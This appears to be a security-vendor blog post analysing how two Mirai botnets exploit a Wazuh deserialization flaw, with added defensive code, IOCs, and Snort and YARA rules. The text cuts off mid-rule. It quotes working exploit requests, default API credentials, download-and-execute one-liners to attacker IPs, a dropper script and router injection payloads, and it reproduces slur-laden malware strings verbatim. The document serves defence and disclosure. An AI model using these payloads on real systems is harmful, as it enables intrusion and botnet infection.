Two Botnets, One Flaw: Mirai Spreads Through Wazuh Vulnerability
CONTENT WARNING: Some of the naming conventions used by the attackers referenced in this article include racial slurs and explicit language. We have not redacted them for educational and discovery purposes. These do not in any way reflect Akamai’s values or viewpoints.
Executive summary
The Akamai Security Intelligence and Response Team (SIRT) has identified active exploitation of the critical remote code execution (RCE) vulnerability CVE-2025-24016 against Wazuh servers (CVSS 9.9).
The flaw lies in how Wazuh deserializes DistributedAPI (DAPI) messages: an unsanitized dictionary injected into a DAPI request is turned into a Python call, so an attacker with API access can remotely execute code on the manager.
We observed two campaigns of Mirai variants exploiting this vulnerability. One of these, “Resbot,” has Italian nomenclature involved in its domains, possibly alluding to the targeted geography or language spoken by the affected device owner.
The Akamai SIRT first observed exploitation attempts in our global honeypot network in March 2025. This is the first reported in-the-wild exploitation of the vulnerability since its disclosure in February 2025.
The botnets exploiting this vulnerability have leveraged several known vulnerabilities, including CVE-2023-1389, CVE-2017-17215, CVE-2017-18368, and others.
We have included a list of indicators of compromise (IOCs) at the end of this blog post to assist in defense against this threat.
Introduction
The Akamai SIRT discovered active exploitation of CVE-2025-24016, a remotely exploitable unsafe deserialization vulnerability in Wazuh, in March 2025, just a few weeks after the vulnerability's initial disclosure.
Although the vulnerability has been public for months, at the time of writing it had not been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, and no active exploitation had been reported. The Akamai SIRT identified two different botnets using this exploit to spread variants of the Mirai malware to vulnerable systems.
What is CVE-2025-24016?
In February 2025, CVE-2025-24016 was disclosed in the manager package of the open source XDR and SIEM solution Wazuh. It affects Wazuh versions 4.4.0 through 4.9.0 and is fixed in version 4.9.1. The vulnerability lets a remote attacker who holds valid API credentials execute arbitrary code on the manager with a maliciously crafted JSON body.
In the Wazuh API, parameters of the DistributedAPI (DAPI) are serialized as JSON and deserialized by the as_wazuh_object function in framework/wazuh/core/cluster/common.py. That function reconstructs objects from special keys in the dictionary, so injecting an unsanitized dictionary into a DAPI request leads to evaluation of attacker-chosen Python code.
In late February 2025, a proof of concept (PoC) showed how to turn this into RCE. The trigger is the run_as authentication endpoint, whose auth_context argument the attacker controls. The PoC author demonstrates it with a Burp Suite request to /security/user/authenticate/run_as (Figure 1).
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}
Fig. 1: Burp Suite request (Source: https://github.com/MuhammadWaseem29/CVE-2025-24016)
The Authorization header is the Base64 encoding of wazuh-wui:MyS3cr37P450r.*-, the default wazuh-wui API password shipped with Wazuh's Docker deployment. Exploitation requires a valid API login, so unchanged default credentials are what make the bug reachable from the internet. The body carries the __unhandled_exc__ key: the deserializer looks up the supplied __class__ name and calls it with __args__, which in the PoC is the builtin exit, enough to prove that an arbitrary callable is reached.
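To make the deserialization flaw concrete, here is an added example (our own code, not Wazuh's and not the PoC): a simplified reconstruction of the vulnerable object hook, which resolves the attacker-supplied __class__ name with eval and calls it with __args__, next to an allowlist-based hook. The PoC body and the Figure 2 body are pushed through both; the vulnerable path is only exercised with harmless callables (len, os.getpid), and the botnet payload is resolved to the function it would call but never invoked. The shape of the hook is an assumption based on the description above, and the allowlist is illustrative, not the upstream 4.9.1 fix.

```python
import json
import os
from typing import Any, Callable

# Request bodies copied from the figures (constructed test data; the IPs stay defanged,
# so nothing here could reach the network even if it were executed).
POC_BODY = {"__unhandled_exc__": {"__class__": "exit", "__args__": []}}
BOTNET_BODY = {
    "__unhandled_exc__": {
        "__args__": [
            "wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || "
            "curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"
        ],
        "__class__": "os.system",
    }
}
# Same shape, harmless callables: used to show that execution really happens.
LEN_BODY = {"__unhandled_exc__": {"__class__": "len", "__args__": ["abcd"]}}
PID_BODY = {"__unhandled_exc__": {"__class__": "os.getpid", "__args__": []}}


def vulnerable_hook(dct: dict) -> Any:
    """Simplified reconstruction of the pre-4.9.1 pattern (an assumption, not Wazuh's
    code): the class name comes straight from the JSON and is evaluated, so any name
    reachable from this module's globals (os.system, builtins, ...) becomes callable."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        return eval(exc["__class__"])(*exc["__args__"])  # attacker controls both operands
    return dct


def resolve_only(body: dict) -> Callable:
    """The same eval, stopped before the call: shows what a payload would invoke."""
    return eval(body["__unhandled_exc__"]["__class__"])


# Our own allowlist (illustrative, not the upstream patch): names are looked up in a
# fixed table of exception classes and never evaluated.
ALLOWED_EXCEPTIONS: dict[str, type] = {"ValueError": ValueError, "KeyError": KeyError}


def hardened_hook(dct: dict) -> Any:
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        name = exc.get("__class__")
        cls = ALLOWED_EXCEPTIONS.get(name)
        if cls is None:
            raise ValueError(f"refusing to deserialize unknown exception class {name!r}")
        args = exc.get("__args__", [])
        if not isinstance(args, list) or not all(isinstance(a, (str, int)) for a in args):
            raise ValueError("__args__ must be a list of plain scalars")
        return cls(*args)
    return dct


def deserialize(body: dict, hook: Callable[[dict], Any]) -> Any:
    """Apply the hook the way json.loads(object_hook=...) does: innermost dicts first."""
    return json.loads(json.dumps(body), object_hook=hook)


def is_rejected(body: dict) -> bool:
    """True when the hardened hook refuses the body."""
    try:
        deserialize(body, hardened_hook)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable hook, len payload ->", deserialize(LEN_BODY, vulnerable_hook))
    print("vulnerable hook, botnet payload would call:", resolve_only(BOTNET_BODY))
    print("hardened hook rejects PoC:", is_rejected(POC_BODY), "botnet:", is_rejected(BOTNET_BODY))
    print("hardened hook accepts:", repr(deserialize(
        {"__unhandled_exc__": {"__class__": "KeyError", "__args__": ["agent_id"]}}, hardened_hook)))
```

The point of the allowlist is that the JSON name is used only as a dictionary key; the attacker can still choose which allowed exception is built and with which scalar arguments, but can no longer name a callable outside the table.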
Active exploitation
Just a few weeks after disclosure, in early March 2025, the Akamai SIRT discovered attempts to exploit this Wazuh vulnerability in our global network of honeypots. This is the latest example of the ever-shrinking time-to-exploit timelines that botnet operators have adopted for newly published CVEs.
The Base64-encoded Authorization header decodes to wazuh-wui:MyS3cr37P450r.*-, the same credentials used in the PoC (Figure 2). The endpoint and request structure also match the PoC; only the __class__ and __args__ values differ, swapping exit for os.system with a download-and-execute one-liner.
/security/user/authenticate/run_as {"__unhandled_exc__":{"__args__":["wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"],"__class__":"os.system"}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Fig. 2: Exploit attempt #1 reuses the PoC's endpoint, structure, and credentials
Additionally, in early May 2025 we detected similarly structured requests sent to the endpoint /wazuh, which is not the endpoint the PoC targets (Figure 3). Because the body and credentials are otherwise almost identical to the PoC, this botnet is most likely still trying to exploit the same Wazuh vulnerability, which is a reason to detect on the request body rather than on the path.
/wazuh {"__unhandled_exc__": {"__class__": "os.system", "__args__": ["wget http://104.168.101[.]27/sh -O- | sh"]}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Fig. 3: Exploit attempt #2 targets a different endpoint from the PoC
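Because the __unhandled_exc__ key belongs to Wazuh's internal cluster traffic, a client request carrying it is worth an alert whatever path it is sent to. The following added example (our own detection logic, not Akamai's or Wazuh's tooling) applies that check to a few constructed request-log lines in a made-up pipe-delimited format: it decodes the Basic header to spot the default credential, classifies the __class__ value, and pulls the download hosts out of __args__. The two attack lines reuse the bodies and header from Figures 2 and 3; the log format, the benign lines, and the extra names in EXEC_NAMES are assumptions.

```python
import base64
import json
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed log excerpt (not a real Wazuh log format): one request per line,
# fields separated by "|": timestamp|source|method|path|Authorization header|body.
# Lines 1-2 carry the bodies and header from Figures 2 and 3 (IPs defanged);
# lines 3-4 are ordinary API traffic made up for contrast.
SAMPLE_LOG = """\
2025-03-05T10:21:07Z|203.0.113.10|POST|/security/user/authenticate/run_as|Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=|{"__unhandled_exc__":{"__args__":["wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"],"__class__":"os.system"}}
2025-05-02T03:14:55Z|203.0.113.11|POST|/wazuh|Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=|{"__unhandled_exc__": {"__class__": "os.system", "__args__": ["wget http://104.168.101[.]27/sh -O- | sh"]}}
2025-05-02T03:15:10Z|10.0.0.5|POST|/security/user/authenticate|Basic b3BzOnMzY3JldA==|
2025-05-02T03:16:00Z|10.0.0.5|GET|/agents?limit=10|Bearer eyJhbGciOi...|
"""

# Default API credential seen in the PoC and in both campaigns; extend with your own defaults.
DEFAULT_CREDENTIALS = {"wazuh-wui:MyS3cr37P450r.*-"}
# Names that mean code execution when they appear as __class__; any dotted name is treated the same.
EXEC_NAMES = {"exit", "quit", "eval", "exec", "compile", "open", "__import__", "breakpoint"}
URL_RE = re.compile(r"(?:https?|tftp|ftp)://([^/\s|;]+)")


@dataclass
class Finding:
    timestamp: str
    source: str
    path: str
    klass: str
    severity: str
    default_credentials: bool
    hosts: list[str] = field(default_factory=list)
    command: str = ""


def decode_basic(header: str) -> Optional[str]:
    """Return user:password from a Basic header, or None for other schemes or garbage."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def find_unhandled_exc(obj) -> Optional[dict]:
    """Walk a parsed body and return the first __unhandled_exc__ dict at any depth."""
    if isinstance(obj, dict):
        if isinstance(obj.get("__unhandled_exc__"), dict):
            return obj["__unhandled_exc__"]
        for value in obj.values():
            hit = find_unhandled_exc(value)
            if hit:
                return hit
    elif isinstance(obj, list):
        for value in obj:
            hit = find_unhandled_exc(value)
            if hit:
                return hit
    return None


def inspect_line(line: str) -> Optional[Finding]:
    ts, src, _method, path, auth, body = line.split("|", 5)
    if "__unhandled_exc__" not in body:
        return None  # clients never legitimately send this key
    uses_default = decode_basic(auth) in DEFAULT_CREDENTIALS
    try:
        exc = find_unhandled_exc(json.loads(body)) or {}
    except json.JSONDecodeError:
        exc = {}  # malformed JSON still carried the key: keep the alert, mark class unknown
    klass = str(exc.get("__class__", "<unparsed>"))
    args = exc.get("__args__", [])
    command = " ".join(str(a) for a in args) if isinstance(args, list) else str(args)
    severity = "critical" if ("." in klass or klass in EXEC_NAMES) else "suspicious"
    hosts = sorted(set(URL_RE.findall(command)))
    return Finding(ts, src, path, klass, severity, uses_default, hosts, command)


def scan_log(text: str) -> list[Finding]:
    return [f for f in (inspect_line(ln) for ln in text.splitlines() if ln.strip()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.severity:10} {f.timestamp} {f.source} {f.path} class={f.klass} "
              f"default_creds={f.default_credentials} hosts={f.hosts}")
```

The hosts pulled from __args__ feed straight into blocklists, and the default-credential flag separates opportunistic spraying (as in both campaigns here) from an attacker who has obtained a real API account.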
Botnet 1: Multiple Mirai variants
The exploitation we observed is tied to two separate botnets. The first is behind the early March 2025 attempts, in which the exploit fetches and runs a shell script that acts as a downloader for the main Mirai payload (Figure 4). Like the typical Mirai dropper scripts, it tries one binary per CPU architecture so that whichever one runs on the victim, primarily Internet of Things (IoT) devices, takes hold.
busybox wget http://176.65.134[.]62/bins/morte.arm; chmod 777 morte.arm; ./morte.arm morte.arm
busybox wget http://176.65.134[.]62/bins/morte.arm5; chmod 777 morte.arm5; ./morte.arm5 morte.arm5
busybox wget http://176.65.134[.]62/bins/morte.arm6; chmod 777 morte.arm6; ./morte.arm6 morte.arm6
busybox wget http://176.65.134[.]62/bins/morte.arm7; chmod 777 morte.arm7; ./morte.arm7 morte.arm7
busybox wget http://176.65.134[.]62/bins/morte.i686; chmod 777 morte.i686; ./morte.i686 morte.i686
busybox wget http://176.65.134[.]62/bins/morte.m68k; chmod 777 morte.m68k; ./morte.m68k morte.m68k
busybox wget http://176.65.134[.]62/bins/morte.mips; chmod 777 morte.mips; ./morte.mips morte.mips
busybox wget http://176.65.134[.]62/bins/morte.mpsl; chmod 777 morte.mpsl; ./morte.mpsl morte.mpsl
busybox wget http://176.65.134[.]62/bins/morte.ppc; chmod 777 morte.ppc; ./morte.ppc morte.ppc
busybox wget http://176.65.134[.]62/bins/morte.sh4; chmod 777 morte.sh4; ./morte.sh4 morte.sh4
busybox wget http://176.65.134[.]62/bins/morte.spc; chmod 777 morte.spc; ./morte.spc morte.spc
busybox wget http://176.65.134[.]62/bins/morte.x86; chmod 777 morte.x86; ./morte.x86 morte.x86
busybox wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x64
rm $0
Fig. 4: Contents of the w.sh shell script
These Mirai samples, named “morte,” appear to be LZRD Mirai variants, which have circulated for some time. They are easy to recognize by the hard-coded string they print to the target's console on execution: “lzrd here”.
Associated domains observed
Pivoting on the IP address 176.65.134[.]62 turned up a resolution from the command and control (C2) domain nuklearcnc.duckdns[.]org. Note that Duck DNS is a free dynamic DNS service; only this particular subdomain is malicious.
In a similar time frame, that domain also resolved to 176.65.142.252, an IP that in turn resolved to another C2 domain, cbot.galaxias[.]cc. Through VirusTotal we found what appears to be a Windows-based RAT that masquerades as the Windows svchost process and beacons to cbot.galaxias[.]cc for C2.
Another subdomain, neon.galaxias[.]cc, had what appeared to be more standard Mirai variant distribution and communication associated with it. One of its resolving IP addresses, 209.141.34[.]106, also resolved to two other C2 domains: pangacnc[.]com, and jimmyudp-raw[.]xyz.
The jimmyudp-raw[.]xyz domain had three different named Mirai malware samples on VirusTotal. The first, called “neon”, is an unidentified Mirai variant that connected to 65.222.202[.]53 over port 80 for C2 communication, and contained the hard-coded console string “fuck u nigga”.
The second, called “k03ldc”, appears to be a modified or upgraded version of the V3G4 Mirai variant. Containing the hard-coded console string of “666V3G4-Katana999”, it connected to 196.251.86[.]49 over port 36063 for C2 communication.
Finally, the third sample, called “KKveTTgaAAsecNNaaaa”, is the original V3G4 Mirai variant. The malware connects to 209.141.34[.]106 over port 60195 for C2 communication, and uses the hard-coded string “xXxSlicexXxxVEGA” upon infection. It recognizes whether a target machine is already infected by the V3G4 variant and, if so, will print “We got this shit already” rather than the typical print.
The pangacnc[.]com domain had two named Mirai samples on VirusTotal. One was the “KKveTTgaAAsecNNaaaa” malware, identical to the sample described above. The other, named “vision,” is an LZRD Mirai variant that connects to 65.222.202[.]53 over port 80, exactly like the “neon” sample from the other C2 domain. This suggests that “neon” is a modified LZRD variant.
Additional vulnerabilities exploited
Aside from targeting the Wazuh RCE, we observed this botnet attempting to exploit a variety of other known vulnerabilities. This included several vulnerabilities that we’ve observed being exploited (Figure 5, Figure 6, and Figure 7) and have documented in previous blog posts.
/ws/v1/cluster/apps {"application-id": "application_1404198295326_0003", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64; curl -O http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64"}}, "application-
Fig. 5: Hadoop YARN ResourceManager REST API command execution (unauthenticated /ws/v1/cluster/apps)
/cgi-bin/luci/;stok=/locale?form=country operation=write&country=$(id>cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://176.65.134[.]62/update.sh; curl -O http://176.65.134[.]62/update.sh; chmod 777 update.sh; sh update.sh; tftp 176.65.134[.]62 -c get tupdate.sh; chmod 777 tupdate.sh; sh tupdate.sh; tftp -r tupdate2.sh -g 176.65.134[.]62; chmod 777 tupdate2.sh; sh tupdate2.sh; ftpget -v -u anonymous -p anonymous -P 21 176.65.134[.]62 update1.sh update1.sh; sh update1.sh; rm -rf update.sh tupdate
Fig. 6: TP-Link Archer AX21 command injection (See https://nvd.nist.gov/vuln/detail/cve-2023-1389)
/manager_dev_ping_t.gch cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.34[.]106/1.sh; curl -O http://209.141.34[.]106/1.sh; chmod 777 1.sh; sh 1.sh; tftp 209.141.34[.]106 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 209.141.34[.]106; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.34[.]106 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3
Fig. 7: ZTE ZXV10 H108L router RCE exploit (See https://github.com/stasinopoulos/ZTExploit/blob/master/ZTExploit_Source/ztexploit.py)
Botnet 2: Resbot/Resentual botnet
The second botnet is the one behind the attempts against the /wazuh endpoint in early May 2025. Like the first, it fetches and executes a shell script that acts as a Mirai downloader. The malware, named “resgod,” is identified by its hard-coded console string “Resentual got you!” and, like the first botnet's payload, is built for a wide range of IoT architectures.
One notable trait of this botnet is its language: the domains used to distribute the malware all have Italian names. “gestisciweb.com,” for example, roughly translates to “manage web.”
These names resemble the lookalike domains commonly used in phishing, since they appear far more legitimate than the botnet's C2 domain, resbot.online, which is more obviously malicious. The Italian naming could indicate a campaign aimed at devices owned and operated by Italian-speaking users.
The sample's strings are not obfuscated and reveal a range of additional scanning and exploitation capabilities. The IP address 104.168.101[.]27 is hard-coded as the C2 server and is contacted over TCP port 62627 (one of several possible C2 ports). We have also seen this botnet attempting to spread over FTP on port 21 and scanning for telnet.
The hard-coded exploits can be seen in Figure 8, Figure 9, Figure 10, and Figure 11.
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 440\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r /resgod.mips; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\r\n\r\n\r\n
Fig. 8: Huawei HG532 router RCE (See https://nvd.nist.gov/vuln/detail/cve-2017-17215)
POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://104.168.101[.]27/resgod.mips; chmod 777 resgod.mips; ./resgod.mips selfrep.realtek</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
Fig. 9: Realtek SDK Miniigd UPnP SOAP RCE (See https://nvd.nist.gov/vuln/detail/cve-2014-8361)
POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 176\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://104.168.101[.]27/resgod.arm7;chmod+777+resgodarm7;./resgodarm7;rm+-rf+resgod.arm7%3b%23&remoteSubmit=Save\r\n\r\n
Fig. 10: TrueOnline ZyXEL P660HN-T v1 router command injection (See https://nvd.nist.gov/vuln/detail/cve-2017-18368)
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(echo -e "wget http://104.168.101[.]27/sh" >> /tmp/.res) HTTP/1.0
Fig. 11: Command injection through an FTP settings form (the svr parameter), used for spreading via FTP
Conclusion
Mirai propagation continues largely unabated: it remains easy to repurpose old source code to stand up new botnets, and operators often succeed simply by adopting newly published exploits.
The CVE program is a net benefit to the industry, but it can cut both ways, drawing attention to vulnerabilities that attackers might otherwise have overlooked.
Public PoCs written to educate organizations keep producing the same unfortunate result, which shows how urgent it is to apply patches as soon as they are released. Botnet operators track vulnerability disclosures, and where a PoC is available they quickly adapt it to spread their malware; here the gap between the PoC and in-the-wild use was a matter of weeks.
Unlike some vulnerabilities we have reported on recently, which often affect only end-of-life devices, CVE-2025-24016 affects actively maintained Wazuh servers that are running outdated versions. Upgrade to a fixed release, Wazuh 4.9.1 or later. Because exploitation requires valid API credentials, also change the default wazuh-wui password that both campaigns rely on, and do not expose the API port (55000 by default) to the internet.
Keep up with us
The Akamai SIRT will continue to monitor and report on threats like this for both our customers and the security community at large. To keep up with the SIRT and other publications from the Akamai Security Intelligence Group, check out our research home page and follow us on social media.
IOCs
We've included a list of IOCs, as well as Snort and YARA rules, to aid defenders.
Snort rules for network IOCs
Snort rules for C2 IPs (botnet #1)
alert ip any any -> [209.141.34.106,176.65.142.137,65.222.202.53,196.251.86.49,176.65.134.62] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000001;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Snort rules for C2 domain resolution detection (botnet #1)
Snort cannot match host names in a rule header, so the rule below inspects DNS queries on UDP/53 instead. In the regex, each dot matches the length byte that separates labels in the wire-format name.
alert udp any any -> any 53 (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain Lookup";
pcre:"/(nuklearcnc.duckdns.org|jimmyudp-raw.xyz|pangacnc.com|neon.galaxias.cc|cbot.galaxias.cc)/i";
sid:2000002; rev:2;
classtype:trojan-activity;
metadata:service dns, malware;
)
Snort rules for C2 IPs (botnet #2)
alert ip any any -> [104.168.101.27,104.168.101.23,79.124.40.46,194.195.90.179] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Snort rules for C2 domain resolution detection (botnet #2)
As above, the rule inspects DNS queries on UDP/53; each dot in the regex matches the label length byte.
alert udp any any -> any 53 (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain Lookup";
pcre:"/(resbot.online|versioneonline.com|web-app-on.com|assicurati-con-linear.online|webdiskwebdisk.webprocediweb.com|continueoraweb.com|ora-0-web.com|adesso-online.com|multi-canale.com|eversioneweb.com|gestisciweb.com)/i";
sid:2000004; rev:2;
classtype:trojan-activity;
metadata:service dns, malware;
)
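Snort matches DNS queries on the wire-format name (a length byte before each label and 0x00 at the end), not on the dotted string, and hand-encoding sixteen domains is error-prone. The added example below (our own helper, not part of Akamai's IOC package) derives that encoding and an exact-match rule per domain from the two domain lists in the IOC section, as an alternative to regex matching, and checks each rule's content against a constructed DNS query so the length bytes are verified before deployment. The sid ranges and message text are assumptions.

```python
import struct

# Domain lists copied from the IOC section (the rules' input, not new data).
BOTNET1_DOMAINS = ["nuklearcnc.duckdns.org", "jimmyudp-raw.xyz", "pangacnc.com",
                   "neon.galaxias.cc", "cbot.galaxias.cc"]
BOTNET2_DOMAINS = ["resbot.online", "versioneonline.com", "web-app-on.com",
                   "assicurati-con-linear.online", "webdiskwebdisk.webprocediweb.com",
                   "continueoraweb.com", "ora-0-web.com", "adesso-online.com",
                   "multi-canale.com", "eversioneweb.com", "gestisciweb.com"]


def labels(domain: str) -> list[str]:
    """Split a domain into labels and reject anything that is not a valid hostname label."""
    parts = domain.strip(".").split(".")
    for part in parts:
        if not (1 <= len(part) <= 63) or not all(c.isalnum() or c == "-" for c in part):
            raise ValueError(f"invalid DNS label {part!r} in {domain!r}")
    return parts


def dns_wire_name(domain: str) -> bytes:
    """Encode a name as it appears in a DNS question: length-prefixed labels, 0x00 root."""
    return b"".join(bytes([len(p)]) + p.encode("ascii") for p in labels(domain)) + b"\x00"


def snort_content(domain: str) -> str:
    """The same bytes in Snort content syntax: |hex| for length bytes, text for labels."""
    return "".join(f"|{len(p):02x}|{p.lower()}" for p in labels(domain)) + "|00|"


def dns_query_rule(domain: str, sid: int, msg: str) -> str:
    return (f'alert udp any any -> any 53 (msg:"{msg} - {domain}"; '
            f'content:"{snort_content(domain)}"; nocase; fast_pattern; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')


def rules_for(domains, first_sid: int, msg: str) -> list[str]:
    return [dns_query_rule(d, first_sid + i, msg) for i, d in enumerate(domains)]


def build_dns_query(domain: str, txid: int = 0x1234) -> bytes:
    """Minimal constructed A query: header with RD set and one question, as a stub resolver sends."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + dns_wire_name(domain) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def query_matches(packet: bytes, domain: str) -> bool:
    """Case-insensitive substring check, the same test Snort's content + nocase performs.
    Lowercasing is safe here: length bytes are at most 63, below the ASCII letter range."""
    return dns_wire_name(domain).lower() in packet.lower()


if __name__ == "__main__":
    for rule in rules_for(BOTNET1_DOMAINS, 2000100, "Botnet #1 C2 DNS lookup"):
        print(rule)
    for rule in rules_for(BOTNET2_DOMAINS, 2000200, "Botnet #2 C2 DNS lookup"):
        print(rule)
```

The trailing |00| keeps the rule from firing on a different zone that merely starts with the same labels, while a lookup for a subdomain of the C2 name still matches because the IOC name appears as a suffix of the wire-format question.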
Yara rules for malware samples (botnet #1)
import "hash"

rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$lzrd = "LZRD" nocase
$fucku = "fuck u nigga"
$vega = "xXxSlicexXxxVEGA"
$we_got_this = "We got this shit already"
$katana = "666V3G4-Katana999"
$ip1 = "209.141.34.106"
$ip2 = "176.65.142.137"
$ip3 = "65.222.202.53"
$ip4 = "196.251.86.49"
$ip5 = "176.65.134.62"
$domain1 = "nuklearcnc.duckdns.org" nocase
$domain2 = "jimmyudp-raw.xyz" nocase
$domain3 = "pangacnc.com" nocase
$domain4 = "neon.galaxias.cc" nocase
$domain5 = "cbot.galaxias.cc" nocase
condition:
any of them or
hash.sha256(0, filesize) == "dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9" or
hash.sha256(0, filesize) == "7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549" or
hash.sha256(0, filesize) == "64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f" or
hash.sha256(0, filesize) == "4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed" or
hash.sha256(0, filesize) == "811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc" or
hash.sha256(0, filesize) == "90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353" or
hash.sha256(0, filesize) == "8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6" or
hash.sha256(0, filesize) == "c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1" or
hash.sha256(0, filesize) == "6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a"
}
Yara rules for malware samples (botnet #2)
import "hash"

rule Mirai_Malware_IOCs_2
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware."
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$resentual = "Resentual got you"
$ip1 = "104.168.101.27"
$ip2 = "104.168.101.23"
$ip3 = "79.124.40.46"
$ip4 = "194.195.90.179"
$domain1 = "resbot.online" nocase
$domain2 = "versioneonline.com" nocase
$domain3 = "web-app-on.com" nocase
$domain4 = "assicurati-con-linear.online" nocase
$domain5 = "webdiskwebdisk.webprocediweb.com" nocase
$domain6 = "continueoraweb.com" nocase
